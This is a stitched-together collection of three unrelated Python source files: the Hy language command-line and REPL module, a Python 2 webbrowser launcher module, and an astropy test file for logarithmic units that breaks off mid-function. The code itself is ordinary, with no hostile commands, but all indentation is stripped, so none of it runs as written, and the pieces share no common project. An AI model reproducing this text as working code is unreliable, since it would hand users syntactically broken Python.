# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import print_function
import argparse
import code
import ast
import sys
import astor.codegen
import hy
from hy.lex import LexException, PrematureEndOfInput, tokenize
from hy.compiler import hy_compile, HyTypeError
from hy.importer import (ast_compile, import_buffer_to_module,
import_file_to_ast, import_file_to_hst)
from hy.completer import completion
from hy.macros import macro, require
from hy.models.expression import HyExpression
from hy.models.string import HyString
from hy.models.symbol import HySymbol
from hy._compat import builtins, PY3
class HyQuitter(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "Use (%s) or Ctrl-D (i.e. EOF) to exit" % (self.name)
__str__ = __repr__
def __call__(self, code=None):
try:
sys.stdin.close()
except:
pass
raise SystemExit(code)
builtins.quit = HyQuitter('quit')
builtins.exit = HyQuitter('exit')
def print_python_code(_ast):
# astor cannot handle ast.Interactive, so disguise it as a module
_ast_for_print = ast.Module()
_ast_for_print.body = _ast.body
print(astor.codegen.to_source(_ast_for_print))
class HyREPL(code.InteractiveConsole):
def __init__(self, spy=False, locals=None, filename="<input>"):
self.spy = spy
code.InteractiveConsole.__init__(self, locals=locals,
filename=filename)
def runsource(self, source, filename='<input>', symbol='single'):
global SIMPLE_TRACEBACKS
try:
tokens = tokenize(source)
except PrematureEndOfInput:
return True
except LexException as e:
if e.source is None:
e.source = source
e.filename = filename
sys.stderr.write(str(e))
return False
try:
_ast = hy_compile(tokens, "__console__", root=ast.Interactive)
if self.spy:
print_python_code(_ast)
code = ast_compile(_ast, filename, symbol)
except HyTypeError as e:
if e.source is None:
e.source = source
e.filename = filename
if SIMPLE_TRACEBACKS:
sys.stderr.write(str(e))
else:
self.showtraceback()
return False
except Exception:
self.showtraceback()
return False
self.runcode(code)
return False
@macro("koan")
def koan_macro():
return HyExpression([HySymbol('print'),
HyString("""
Ummon asked the head monk, "What sutra are you lecturing on?"
"The Nirvana Sutra."
"The Nirvana Sutra has the Four Virtues, hasn't it?"
"It has."
Ummon asked, picking up a cup, "How many virtues has this?"
"None at all, " said the monk.
"But ancient people said it had, didn't they?" said Ummon.
"Whatdo you think of what they said?"
Ummon struck the cup and asked, "You understand?"
"No," said the monk.
"Then," said Ummon, "You'd better go on with your lectures on the sutra."
""")])
@macro("ideas")
def ideas_macro():
return HyExpression([HySymbol('print'),
HyString("""
=> (import [sh [figlet]])
=> (figlet "Hi, Hy!")
_ _ _ _ _ _
| | | (_) | | | |_ _| |
| |_| | | | |_| | | | | |
| _ | |_ | _ | |_| |_|
|_| |_|_( ) |_| |_|\__, (_)
|/ |___/
;;; string things
(.join ", " ["what" "the" "heck"])
;;; this one plays with command line bits
(import [sh [cat grep]])
(-> (cat "/usr/share/dict/words") (grep "-E" "bro$"))
;;; filtering a list w/ a lambda
(filter (lambda [x] (= (% x 2) 0)) (range 0 10))
;;; swaggin' functional bits (Python rulez)
(max (map (lambda [x] (len x)) ["hi" "my" "name" "is" "paul"]))
""")])
require("hy.cmdline", "__console__")
require("hy.cmdline", "__main__")
SIMPLE_TRACEBACKS = True
def run_command(source):
try:
import_buffer_to_module("__main__", source)
except (HyTypeError, LexException) as e:
if SIMPLE_TRACEBACKS:
sys.stderr.write(str(e))
return 1
raise
except Exception:
raise
return 0
def run_file(filename):
from hy.importer import import_file_to_module
try:
import_file_to_module("__main__", filename)
except (HyTypeError, LexException) as e:
if SIMPLE_TRACEBACKS:
sys.stderr.write(str(e))
return 1
raise
except Exception:
raise
return 0
def run_repl(hr=None, spy=False):
import platform
sys.ps1 = "=> "
sys.ps2 = "... "
with completion():
if not hr:
hr = HyREPL(spy)
hr.interact("{appname} {version} using "
"{py}({build}) {pyversion} on {os}".format(
appname=hy.__appname__,
version=hy.__version__,
py=platform.python_implementation(),
build=platform.python_build()[0],
pyversion=platform.python_version(),
os=platform.system()
))
return 0
def run_icommand(source, spy=False):
hr = HyREPL(spy)
hr.runsource(source, filename='<input>', symbol='single')
return run_repl(hr)
USAGE = "%(prog)s [-h | -i cmd | -c cmd | file | -] [arg] ..."
VERSION = "%(prog)s " + hy.__version__
EPILOG = """ file program read from script
- program read from stdin
[arg] ... arguments passed to program in sys.argv[1:]
"""
def cmdline_handler(scriptname, argv):
parser = argparse.ArgumentParser(
prog="hy",
usage=USAGE,
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=EPILOG)
parser.add_argument("-c", dest="command",
help="program passed in as a string")
parser.add_argument(
"-i", dest="icommand",
help="program passed in as a string, then stay in REPL")
parser.add_argument("--spy", action="store_true",
help="print equivalent Python code before executing")
parser.add_argument("-v", action="version", version=VERSION)
parser.add_argument("--show-tracebacks", action="store_true",
help="show complete tracebacks for Hy exceptions")
# this will contain the script/program name and any arguments for it.
parser.add_argument('args', nargs=argparse.REMAINDER,
help=argparse.SUPPRESS)
# stash the hy exectuable in case we need it later
# mimics Python sys.executable
hy.executable = argv[0]
options = parser.parse_args(argv[1:])
if options.show_tracebacks:
global SIMPLE_TRACEBACKS
SIMPLE_TRACEBACKS = False
# reset sys.argv like Python
sys.argv = options.args or [""]
if options.command:
# User did "hy -c ..."
return run_command(options.command)
if options.icommand:
# User did "hy -i ..."
return run_icommand(options.icommand, spy=options.spy)
if options.args:
if options.args[0] == "-":
# Read the program from stdin
return run_command(sys.stdin.read())
else:
# User did "hy <filename>"
try:
return run_file(options.args[0])
except IOError as x:
sys.stderr.write("hy: Can't open file '%s': [Errno %d] %s\n" %
(x.filename, x.errno, x.strerror))
sys.exit(x.errno)
# User did NOTHING!
return run_repl(spy=options.spy)
# entry point for cmd line script "hy"
def hy_main():
sys.exit(cmdline_handler("hy", sys.argv))
# entry point for cmd line script "hyc"
def hyc_main():
from hy.importer import write_hy_as_pyc
parser = argparse.ArgumentParser(prog="hyc")
parser.add_argument("files", metavar="FILE", nargs='+',
help="file to compile")
parser.add_argument("-v", action="version", version=VERSION)
options = parser.parse_args(sys.argv[1:])
for file in options.files:
try:
write_hy_as_pyc(file)
print("Compiling %s" % file)
except IOError as x:
sys.stderr.write("hyc: Can't open file '%s': [Errno %d] %s\n" %
(x.filename, x.errno, x.strerror))
sys.exit(x.errno)
# entry point for cmd line script "hy2py"
def hy2py_main():
import platform
module_name = "<STDIN>"
options = dict(prog="hy2py", usage="%(prog)s [options] FILE",
formatter_class=argparse.RawDescriptionHelpFormatter)
parser = argparse.ArgumentParser(**options)
parser.add_argument("--with-source", "-s", action="store_true",
help="Show the parsed source structure")
parser.add_argument("--with-ast", "-a", action="store_true",
help="Show the generated AST")
parser.add_argument("--without-python", "-np", action="store_true",
help=("Do not show the Python code generated "
"from the AST"))
parser.add_argument('args', nargs=argparse.REMAINDER,
help=argparse.SUPPRESS)
options = parser.parse_args(sys.argv[1:])
if not options.args:
parser.exit(1, parser.format_help())
if options.with_source:
hst = import_file_to_hst(options.args[0])
# need special printing on Windows in case the
# codepage doesn't support utf-8 characters
if PY3 and platform.system() == "Windows":
for h in hst:
try:
print(h)
except:
print(str(h).encode('utf-8'))
else:
print(hst)
print()
print()
_ast = import_file_to_ast(options.args[0], module_name)
if options.with_ast:
if PY3 and platform.system() == "Windows":
_print_for_windows(astor.dump(_ast))
else:
print(astor.dump(_ast))
print()
print()
if not options.without_python:
if PY3 and platform.system() == "Windows":
_print_for_windows(astor.codegen.to_source(_ast))
else:
print(astor.codegen.to_source(_ast))
parser.exit(0)
# need special printing on Windows in case the
# codepage doesn't support utf-8 characters
def _print_for_windows(src):
for line in src.split("\n"):
try:
print(line)
except:
print(line.encode('utf-8'))
|
|
#!/usr/pkg/bin/python2.7
"""Interfaces for launching and remotely controlling Web browsers."""
# Maintained by Georg Brandl.
import os
import shlex
import sys
import stat
import subprocess
import time
__all__ = ["Error", "open", "open_new", "open_new_tab", "get", "register"]
class Error(Exception):
pass
_browsers = {} # Dictionary of available browser controllers
_tryorder = [] # Preference order of available browsers
def register(name, klass, instance=None, update_tryorder=1):
"""Register a browser connector and, optionally, connection."""
_browsers[name.lower()] = [klass, instance]
if update_tryorder > 0:
_tryorder.append(name)
elif update_tryorder < 0:
_tryorder.insert(0, name)
def get(using=None):
"""Return a browser launcher instance appropriate for the environment."""
if using is not None:
alternatives = [using]
else:
alternatives = _tryorder
for browser in alternatives:
if '%s' in browser:
# User gave us a command line, split it into name and args
browser = shlex.split(browser)
if browser[-1] == '&':
return BackgroundBrowser(browser[:-1])
else:
return GenericBrowser(browser)
else:
# User gave us a browser name or path.
try:
command = _browsers[browser.lower()]
except KeyError:
command = _synthesize(browser)
if command[1] is not None:
return command[1]
elif command[0] is not None:
return command[0]()
raise Error("could not locate runnable browser")
# Please note: the following definition hides a builtin function.
# It is recommended one does "import webbrowser" and uses webbrowser.open(url)
# instead of "from webbrowser import *".
def open(url, new=0, autoraise=True):
for name in _tryorder:
browser = get(name)
if browser.open(url, new, autoraise):
return True
return False
def open_new(url):
return open(url, 1)
def open_new_tab(url):
return open(url, 2)
def _synthesize(browser, update_tryorder=1):
"""Attempt to synthesize a controller base on existing controllers.
This is useful to create a controller when a user specifies a path to
an entry in the BROWSER environment variable -- we can copy a general
controller to operate using a specific installation of the desired
browser in this way.
If we can't create a controller in this way, or if there is no
executable for the requested browser, return [None, None].
"""
cmd = browser.split()[0]
if not _iscommand(cmd):
return [None, None]
name = os.path.basename(cmd)
try:
command = _browsers[name.lower()]
except KeyError:
return [None, None]
# now attempt to clone to fit the new name:
controller = command[1]
if controller and name.lower() == controller.basename:
import copy
controller = copy.copy(controller)
controller.name = browser
controller.basename = os.path.basename(browser)
register(browser, None, controller, update_tryorder)
return [None, controller]
return [None, None]
if sys.platform[:3] == "win":
def _isexecutable(cmd):
cmd = cmd.lower()
if os.path.isfile(cmd) and cmd.endswith((".exe", ".bat")):
return True
for ext in ".exe", ".bat":
if os.path.isfile(cmd + ext):
return True
return False
else:
def _isexecutable(cmd):
if os.path.isfile(cmd):
mode = os.stat(cmd)[stat.ST_MODE]
if mode & stat.S_IXUSR or mode & stat.S_IXGRP or mode & stat.S_IXOTH:
return True
return False
def _iscommand(cmd):
"""Return True if cmd is executable or can be found on the executable
search path."""
if _isexecutable(cmd):
return True
path = os.environ.get("PATH")
if not path:
return False
for d in path.split(os.pathsep):
exe = os.path.join(d, cmd)
if _isexecutable(exe):
return True
return False
# General parent classes
class BaseBrowser(object):
"""Parent class for all browsers. Do not use directly."""
args = ['%s']
def __init__(self, name=""):
self.name = name
self.basename = name
def open(self, url, new=0, autoraise=True):
raise NotImplementedError
def open_new(self, url):
return self.open(url, 1)
def open_new_tab(self, url):
return self.open(url, 2)
class GenericBrowser(BaseBrowser):
"""Class for all browsers started with a command
and without remote functionality."""
def __init__(self, name):
if isinstance(name, basestring):
self.name = name
self.args = ["%s"]
else:
# name should be a list with arguments
self.name = name[0]
self.args = name[1:]
self.basename = os.path.basename(self.name)
def open(self, url, new=0, autoraise=True):
cmdline = [self.name] + [arg.replace("%s", url)
for arg in self.args]
try:
if sys.platform[:3] == 'win':
p = subprocess.Popen(cmdline)
else:
p = subprocess.Popen(cmdline, close_fds=True)
return not p.wait()
except OSError:
return False
class BackgroundBrowser(GenericBrowser):
"""Class for all browsers which are to be started in the
background."""
def open(self, url, new=0, autoraise=True):
cmdline = [self.name] + [arg.replace("%s", url)
for arg in self.args]
try:
if sys.platform[:3] == 'win':
p = subprocess.Popen(cmdline)
else:
setsid = getattr(os, 'setsid', None)
if not setsid:
setsid = getattr(os, 'setpgrp', None)
p = subprocess.Popen(cmdline, close_fds=True, preexec_fn=setsid)
return (p.poll() is None)
except OSError:
return False
class UnixBrowser(BaseBrowser):
"""Parent class for all Unix browsers with remote functionality."""
raise_opts = None
remote_args = ['%action', '%s']
remote_action = None
remote_action_newwin = None
remote_action_newtab = None
background = False
redirect_stdout = True
def _invoke(self, args, remote, autoraise):
raise_opt = []
if remote and self.raise_opts:
# use autoraise argument only for remote invocation
autoraise = int(autoraise)
opt = self.raise_opts[autoraise]
if opt: raise_opt = [opt]
cmdline = [self.name] + raise_opt + args
if remote or self.background:
inout = file(os.devnull, "r+")
else:
# for TTY browsers, we need stdin/out
inout = None
# if possible, put browser in separate process group, so
# keyboard interrupts don't affect browser as well as Python
setsid = getattr(os, 'setsid', None)
if not setsid:
setsid = getattr(os, 'setpgrp', None)
p = subprocess.Popen(cmdline, close_fds=True, stdin=inout,
stdout=(self.redirect_stdout and inout or None),
stderr=inout, preexec_fn=setsid)
if remote:
# wait five secons. If the subprocess is not finished, the
# remote invocation has (hopefully) started a new instance.
time.sleep(1)
rc = p.poll()
if rc is None:
time.sleep(4)
rc = p.poll()
if rc is None:
return True
# if remote call failed, open() will try direct invocation
return not rc
elif self.background:
if p.poll() is None:
return True
else:
return False
else:
return not p.wait()
def open(self, url, new=0, autoraise=True):
if new == 0:
action = self.remote_action
elif new == 1:
action = self.remote_action_newwin
elif new == 2:
if self.remote_action_newtab is None:
action = self.remote_action_newwin
else:
action = self.remote_action_newtab
else:
raise Error("Bad 'new' parameter to open(); " +
"expected 0, 1, or 2, got %s" % new)
args = [arg.replace("%s", url).replace("%action", action)
for arg in self.remote_args]
success = self._invoke(args, True, autoraise)
if not success:
# remote invocation failed, try straight way
args = [arg.replace("%s", url) for arg in self.args]
return self._invoke(args, False, False)
else:
return True
class Mozilla(UnixBrowser):
"""Launcher class for Mozilla/Netscape browsers."""
raise_opts = ["-noraise", "-raise"]
remote_args = ['-remote', 'openURL(%s%action)']
remote_action = ""
remote_action_newwin = ",new-window"
remote_action_newtab = ",new-tab"
background = True
Netscape = Mozilla
class Galeon(UnixBrowser):
"""Launcher class for Galeon/Epiphany browsers."""
raise_opts = ["-noraise", ""]
remote_args = ['%action', '%s']
remote_action = "-n"
remote_action_newwin = "-w"
background = True
class Opera(UnixBrowser):
"Launcher class for Opera browser."
raise_opts = ["-noraise", ""]
remote_args = ['-remote', 'openURL(%s%action)']
remote_action = ""
remote_action_newwin = ",new-window"
remote_action_newtab = ",new-page"
background = True
class Elinks(UnixBrowser):
"Launcher class for Elinks browsers."
remote_args = ['-remote', 'openURL(%s%action)']
remote_action = ""
remote_action_newwin = ",new-window"
remote_action_newtab = ",new-tab"
background = False
# elinks doesn't like its stdout to be redirected -
# it uses redirected stdout as a signal to do -dump
redirect_stdout = False
class Konqueror(BaseBrowser):
"""Controller for the KDE File Manager (kfm, or Konqueror).
See the output of ``kfmclient --commands``
for more information on the Konqueror remote-control interface.
"""
def open(self, url, new=0, autoraise=True):
# XXX Currently I know no way to prevent KFM from opening a new win.
if new == 2:
action = "newTab"
else:
action = "openURL"
devnull = file(os.devnull, "r+")
# if possible, put browser in separate process group, so
# keyboard interrupts don't affect browser as well as Python
setsid = getattr(os, 'setsid', None)
if not setsid:
setsid = getattr(os, 'setpgrp', None)
try:
p = subprocess.Popen(["kfmclient", action, url],
close_fds=True, stdin=devnull,
stdout=devnull, stderr=devnull)
except OSError:
# fall through to next variant
pass
else:
p.wait()
# kfmclient's return code unfortunately has no meaning as it seems
return True
try:
p = subprocess.Popen(["konqueror", "--silent", url],
close_fds=True, stdin=devnull,
stdout=devnull, stderr=devnull,
preexec_fn=setsid)
except OSError:
# fall through to next variant
pass
else:
if p.poll() is None:
# Should be running now.
return True
try:
p = subprocess.Popen(["kfm", "-d", url],
close_fds=True, stdin=devnull,
stdout=devnull, stderr=devnull,
preexec_fn=setsid)
except OSError:
return False
else:
return (p.poll() is None)
class Grail(BaseBrowser):
# There should be a way to maintain a connection to Grail, but the
# Grail remote control protocol doesn't really allow that at this
# point. It probably never will!
def _find_grail_rc(self):
import glob
import pwd
import socket
import tempfile
tempdir = os.path.join(tempfile.gettempdir(),
".grail-unix")
user = pwd.getpwuid(os.getuid())[0]
filename = os.path.join(tempdir, user + "-*")
maybes = glob.glob(filename)
if not maybes:
return None
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
for fn in maybes:
# need to PING each one until we find one that's live
try:
s.connect(fn)
except socket.error:
# no good; attempt to clean it out, but don't fail:
try:
os.unlink(fn)
except IOError:
pass
else:
return s
def _remote(self, action):
s = self._find_grail_rc()
if not s:
return 0
s.send(action)
s.close()
return 1
def open(self, url, new=0, autoraise=True):
if new:
ok = self._remote("LOADNEW " + url)
else:
ok = self._remote("LOAD " + url)
return ok
#
# Platform support for Unix
#
# These are the right tests because all these Unix browsers require either
# a console terminal or an X display to run.
def register_X_browsers():
# The default GNOME browser
if "GNOME_DESKTOP_SESSION_ID" in os.environ and _iscommand("gnome-open"):
register("gnome-open", None, BackgroundBrowser("gnome-open"))
# The default KDE browser
if "KDE_FULL_SESSION" in os.environ and _iscommand("kfmclient"):
register("kfmclient", Konqueror, Konqueror("kfmclient"))
# The Mozilla/Netscape browsers
for browser in ("mozilla-firefox", "firefox",
"mozilla-firebird", "firebird",
"seamonkey", "mozilla", "netscape"):
if _iscommand(browser):
register(browser, None, Mozilla(browser))
# Konqueror/kfm, the KDE browser.
if _iscommand("kfm"):
register("kfm", Konqueror, Konqueror("kfm"))
elif _iscommand("konqueror"):
register("konqueror", Konqueror, Konqueror("konqueror"))
# Gnome's Galeon and Epiphany
for browser in ("galeon", "epiphany"):
if _iscommand(browser):
register(browser, None, Galeon(browser))
# Skipstone, another Gtk/Mozilla based browser
if _iscommand("skipstone"):
register("skipstone", None, BackgroundBrowser("skipstone"))
# Opera, quite popular
if _iscommand("opera"):
register("opera", None, Opera("opera"))
# Next, Mosaic -- old but still in use.
if _iscommand("mosaic"):
register("mosaic", None, BackgroundBrowser("mosaic"))
# Grail, the Python browser. Does anybody still use it?
if _iscommand("grail"):
register("grail", Grail, None)
# Prefer X browsers if present
if os.environ.get("DISPLAY"):
register_X_browsers()
# Also try console browsers
if os.environ.get("TERM"):
# The Links/elinks browsers <http://artax.karlin.mff.cuni.cz/~mikulas/links/>
if _iscommand("links"):
register("links", None, GenericBrowser("links"))
if _iscommand("elinks"):
register("elinks", None, Elinks("elinks"))
# The Lynx browser <http://lynx.isc.org/>, <http://lynx.browser.org/>
if _iscommand("lynx"):
register("lynx", None, GenericBrowser("lynx"))
# The w3m browser <http://w3m.sourceforge.net/>
if _iscommand("w3m"):
register("w3m", None, GenericBrowser("w3m"))
#
# Platform support for Windows
#
if sys.platform[:3] == "win":
class WindowsDefault(BaseBrowser):
def open(self, url, new=0, autoraise=True):
try:
os.startfile(url)
except WindowsError:
# [Error 22] No application is associated with the specified
# file for this operation: '<URL>'
return False
else:
return True
_tryorder = []
_browsers = {}
# First try to use the default Windows browser
register("windows-default", WindowsDefault)
# Detect some common Windows browsers, fallback to IE
iexplore = os.path.join(os.environ.get("PROGRAMFILES", "C:\\Program Files"),
"Internet Explorer\\IEXPLORE.EXE")
for browser in ("firefox", "firebird", "seamonkey", "mozilla",
"netscape", "opera", iexplore):
if _iscommand(browser):
register(browser, None, BackgroundBrowser(browser))
#
# Platform support for MacOS
#
if sys.platform == 'darwin':
# Adapted from patch submitted to SourceForge by Steven J. Burr
class MacOSX(BaseBrowser):
"""Launcher class for Aqua browsers on Mac OS X
Optionally specify a browser name on instantiation. Note that this
will not work for Aqua browsers if the user has moved the application
package after installation.
If no browser is specified, the default browser, as specified in the
Internet System Preferences panel, will be used.
"""
def __init__(self, name):
self.name = name
def open(self, url, new=0, autoraise=True):
assert "'" not in url
# hack for local urls
if not ':' in url:
url = 'file:'+url
# new must be 0 or 1
new = int(bool(new))
if self.name == "default":
# User called open, open_new or get without a browser parameter
script = 'open location "%s"' % url.replace('"', '%22') # opens in default browser
else:
# User called get and chose a browser
if self.name == "OmniWeb":
toWindow = ""
else:
# Include toWindow parameter of OpenURL command for browsers
# that support it. 0 == new window; -1 == existing
toWindow = "toWindow %d" % (new - 1)
cmd = 'OpenURL "%s"' % url.replace('"', '%22')
script = '''tell application "%s"
activate
%s %s
end tell''' % (self.name, cmd, toWindow)
# Open pipe to AppleScript through osascript command
osapipe = os.popen("osascript", "w")
if osapipe is None:
return False
# Write script to osascript's stdin
osapipe.write(script)
rc = osapipe.close()
return not rc
class MacOSXOSAScript(BaseBrowser):
def __init__(self, name):
self._name = name
def open(self, url, new=0, autoraise=True):
if self._name == 'default':
script = 'open location "%s"' % url.replace('"', '%22') # opens in default browser
else:
script = '''
tell application "%s"
activate
open location "%s"
end
'''%(self._name, url.replace('"', '%22'))
osapipe = os.popen("osascript", "w")
if osapipe is None:
return False
osapipe.write(script)
rc = osapipe.close()
return not rc
# Don't clear _tryorder or _browsers since OS X can use above Unix support
# (but we prefer using the OS X specific stuff)
register("safari", None, MacOSXOSAScript('safari'), -1)
register("firefox", None, MacOSXOSAScript('firefox'), -1)
register("MacOSX", None, MacOSXOSAScript('default'), -1)
#
# Platform support for OS/2
#
if sys.platform[:3] == "os2" and _iscommand("netscape"):
_tryorder = []
_browsers = {}
register("os2netscape", None,
GenericBrowser(["start", "netscape", "%s"]), -1)
# OK, now that we know what the default preference orders for each
# platform are, allow user to override them with the BROWSER variable.
if "BROWSER" in os.environ:
_userchoices = os.environ["BROWSER"].split(os.pathsep)
_userchoices.reverse()
# Treat choices in same way as if passed into get() but do register
# and prepend to _tryorder
for cmdline in _userchoices:
if cmdline != '':
cmd = _synthesize(cmdline, -1)
if cmd[1] is None:
register(cmdline, None, GenericBrowser(cmdline), -1)
cmdline = None # to make del work if _userchoices was empty
del cmdline
del _userchoices
# what to do if _tryorder is now empty?
def main():
import getopt
usage = """Usage: %s [-n | -t] url
-n: open new window
-t: open new tab""" % sys.argv[0]
try:
opts, args = getopt.getopt(sys.argv[1:], 'ntd')
except getopt.error, msg:
print >>sys.stderr, msg
print >>sys.stderr, usage
sys.exit(1)
new_win = 0
for o, a in opts:
if o == '-n': new_win = 1
elif o == '-t': new_win = 2
if len(args) != 1:
print >>sys.stderr, usage
sys.exit(1)
url = args[0]
open(url, new_win)
print "\a"
if __name__ == "__main__":
main()
|
|
# coding: utf-8
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Test the Logarithmic Units and Quantities
"""
import pickle
import itertools
import pytest
import numpy as np
from numpy.testing import assert_allclose
from astropy.tests.helper import assert_quantity_allclose
from astropy import units as u, constants as c
lu_units = [u.dex, u.mag, u.decibel]
lu_subclasses = [u.DexUnit, u.MagUnit, u.DecibelUnit]
lq_subclasses = [u.Dex, u.Magnitude, u.Decibel]
pu_sample = (u.dimensionless_unscaled, u.m, u.g/u.s**2, u.Jy)
class TestLogUnitCreation:
def test_logarithmic_units(self):
"""Check logarithmic units are set up correctly."""
assert u.dB.to(u.dex) == 0.1
assert u.dex.to(u.mag) == -2.5
assert u.mag.to(u.dB) == -4
@pytest.mark.parametrize('lu_unit, lu_cls', zip(lu_units, lu_subclasses))
def test_callable_units(self, lu_unit, lu_cls):
assert isinstance(lu_unit, u.UnitBase)
assert callable(lu_unit)
assert lu_unit._function_unit_class is lu_cls
@pytest.mark.parametrize('lu_unit', lu_units)
def test_equality_to_normal_unit_for_dimensionless(self, lu_unit):
lu = lu_unit()
assert lu == lu._default_function_unit # eg, MagUnit() == u.mag
assert lu._default_function_unit == lu # and u.mag == MagUnit()
@pytest.mark.parametrize('lu_unit, physical_unit',
itertools.product(lu_units, pu_sample))
def test_call_units(self, lu_unit, physical_unit):
"""Create a LogUnit subclass using the callable unit and physical unit,
and do basic check that output is right."""
lu1 = lu_unit(physical_unit)
assert lu1.physical_unit == physical_unit
assert lu1.function_unit == lu1._default_function_unit
def test_call_invalid_unit(self):
with pytest.raises(TypeError):
u.mag([])
with pytest.raises(ValueError):
u.mag(u.mag())
@pytest.mark.parametrize('lu_cls, physical_unit', itertools.product(
lu_subclasses + [u.LogUnit], pu_sample))
def test_subclass_creation(self, lu_cls, physical_unit):
"""Create a LogUnit subclass object for given physical unit,
and do basic check that output is right."""
lu1 = lu_cls(physical_unit)
assert lu1.physical_unit == physical_unit
assert lu1.function_unit == lu1._default_function_unit
lu2 = lu_cls(physical_unit,
function_unit=2*lu1._default_function_unit)
assert lu2.physical_unit == physical_unit
assert lu2.function_unit == u.Unit(2*lu2._default_function_unit)
with pytest.raises(ValueError):
lu_cls(physical_unit, u.m)
def test_lshift_magnitude(self):
mag = 1. << u.ABmag
assert isinstance(mag, u.Magnitude)
assert mag.unit == u.ABmag
assert mag.value == 1.
# same test for an array, which should produce a view
a2 = np.arange(10.)
q2 = a2 << u.ABmag
assert isinstance(q2, u.Magnitude)
assert q2.unit == u.ABmag
assert np.all(q2.value == a2)
a2[9] = 0.
assert np.all(q2.value == a2)
# a different magnitude unit
mag = 10. << u.STmag
assert isinstance(mag, u.Magnitude)
assert mag.unit == u.STmag
assert mag.value == 10.
def test_ilshift_magnitude(self):
# test in-place operation and conversion
mag_fnu_cgs = u.mag(u.erg/u.s/u.cm**2/u.Hz)
m = np.arange(10.0) * u.mag(u.Jy)
jy = m.physical
m2 = m << mag_fnu_cgs
assert np.all(m2 == m.to(mag_fnu_cgs))
m2 = m
m <<= mag_fnu_cgs
assert m is m2 # Check it was done in-place!
assert np.all(m.value == m2.value)
assert m.unit == mag_fnu_cgs
# Check it works if equivalencies are in-place.
with u.add_enabled_equivalencies(u.spectral_density(5500*u.AA)):
st = jy.to(u.ST)
m <<= u.STmag
assert m is m2
assert_quantity_allclose(m.physical, st)
assert m.unit == u.STmag
def test_lshift_errors(self):
m = np.arange(10.0) * u.mag(u.Jy)
with pytest.raises(u.UnitsError):
m << u.STmag
with pytest.raises(u.UnitsError):
m << u.Jy
with pytest.raises(u.UnitsError):
m <<= u.STmag
with pytest.raises(u.UnitsError):
m <<= u.Jy
def test_predefined_magnitudes():
assert_quantity_allclose((-21.1*u.STmag).physical,
1.*u.erg/u.cm**2/u.s/u.AA)
assert_quantity_allclose((-48.6*u.ABmag).physical,
1.*u.erg/u.cm**2/u.s/u.Hz)
assert_quantity_allclose((0*u.M_bol).physical, c.L_bol0)
assert_quantity_allclose((0*u.m_bol).physical,
c.L_bol0/(4.*np.pi*(10.*c.pc)**2))
def test_predefined_reinitialisation():
assert u.mag('STflux') == u.STmag
assert u.mag('ABflux') == u.ABmag
assert u.mag('Bol') == u.M_bol
assert u.mag('bol') == u.m_bol
# required for backwards-compatibility, at least unless deprecated
assert u.mag('ST') == u.STmag
assert u.mag('AB') == u.ABmag
def test_predefined_string_roundtrip():
"""Ensure round-tripping; see #5015"""
assert u.Unit(u.STmag.to_string()) == u.STmag
assert u.Unit(u.ABmag.to_string()) == u.ABmag
assert u.Unit(u.M_bol.to_string()) == u.M_bol
assert u.Unit(u.m_bol.to_string()) == u.m_bol
def test_inequality():
"""Check __ne__ works (regresssion for #5342)."""
lu1 = u.mag(u.Jy)
lu2 = u.dex(u.Jy)
lu3 = u.mag(u.Jy**2)
lu4 = lu3 - lu1
assert lu1 != lu2
assert lu1 != lu3
assert lu1 == lu4
class TestLogUnitStrings:
def test_str(self):
"""Do some spot checks that str, repr, etc. work as expected."""
lu1 = u.mag(u.Jy)
assert str(lu1) == 'mag(Jy)'
assert repr(lu1) == 'Unit("mag(Jy)")'
assert lu1.to_string('generic') == 'mag(Jy)'
with pytest.raises(ValueError):
lu1.to_string('fits')
lu2 = u.dex()
assert str(lu2) == 'dex'
assert repr(lu2) == 'Unit("dex(1)")'
assert lu2.to_string() == 'dex(1)'
lu3 = u.MagUnit(u.Jy, function_unit=2*u.mag)
assert str(lu3) == '2 mag(Jy)'
assert repr(lu3) == 'MagUnit("Jy", unit="2 mag")'
assert lu3.to_string() == '2 mag(Jy)'
lu4 = u.mag(u.ct)
assert lu4.to_string('generic') == 'mag(ct)'
assert lu4.to_string('latex') == ('$\\mathrm{mag}$$\\mathrm{\\left( '
'\\mathrm{ct} \\right)}$')
assert lu4._repr_latex_() == lu4.to_string('latex')
class TestLogUnitConversion:
@pytest.mark.parametrize('lu_unit, physical_unit',
itertools.product(lu_units, pu_sample))
def test_physical_unit_conversion(self, lu_unit, physical_unit):
"""Check various LogUnit subclasses are equivalent and convertible
to their non-log counterparts."""
lu1 = lu_unit(physical_unit)
assert lu1.is_equivalent(physical_unit)
assert lu1.to(physical_unit, 0.) == 1.
assert physical_unit.is_equivalent(lu1)
assert physical_unit.to(lu1, 1.) == 0.
pu = u.Unit(8.*physical_unit)
assert lu1.is_equivalent(physical_unit)
assert lu1.to(pu, 0.) == 0.125
assert pu.is_equivalent(lu1)
assert_allclose(pu.to(lu1, 0.125), 0., atol=1.e-15)
# Check we round-trip.
value = np.linspace(0., 10., 6)
assert_allclose(pu.to(lu1, lu1.to(pu, value)), value, atol=1.e-15)
# And that we're not just returning True all the time.
pu2 = u.g
assert not lu1.is_equivalent(pu2)
with pytest.raises(u.UnitsError):
lu1.to(pu2)
assert not pu2.is_equivalent(lu1)
with pytest.raises(u.UnitsError):
pu2.to(lu1)
@pytest.mark.parametrize('lu_unit', lu_units)
def test_container_unit_conversion(self, lu_unit):
"""Check that conversion to logarithmic units (u.mag, u.dB, u.dex)
is only possible when the physical unit is dimensionless."""
values = np.linspace(0., 10., 6)
lu1 = lu_unit(u.dimensionless_unscaled)
assert lu1.is_equivalent(lu1.function_unit)
assert_allclose(lu1.to(lu1.function_unit, values), values)
lu2 = lu_unit(u.Jy)
assert not lu2.is_equivalent(lu2.function_unit)
with pytest.raises(u.UnitsError):
lu2.to(lu2.function_unit, values)
@pytest.mark.parametrize(
'flu_unit, tlu_unit, physical_unit',
itertools.product(lu_units, lu_units, pu_sample))
def test_subclass_conversion(self, flu_unit, tlu_unit, physical_unit):
